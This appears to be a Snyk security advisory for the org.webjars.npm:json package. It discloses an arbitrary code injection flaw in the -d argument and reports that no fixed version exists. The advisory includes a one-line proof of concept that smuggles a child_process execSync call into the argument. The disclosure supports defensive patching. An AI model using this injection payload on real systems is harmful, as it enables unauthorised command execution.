Arbitrary Code Injection Affecting org.webjars.npm:json package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-1088048
- published 22 Mar 2021
- disclosed 5 Mar 2021
- credit splitline
How to fix?
There is no fixed version for org.webjars.npm:json
.
Overview
org.webjars.npm:json is an a 'json' command for massaging and processing JSON on the command line
Affected versions of this package are vulnerable to Arbitrary Code Injection via the -d
argument.
PoC
curl -sL 'https://api.github.com/repos/joyent/node/issues?state=open' | node_modules/json/lib/json.js -a created_at number title -d '""+require(`child_process`).execSync(`id`)//'
References
CVSS Scores
version 3.1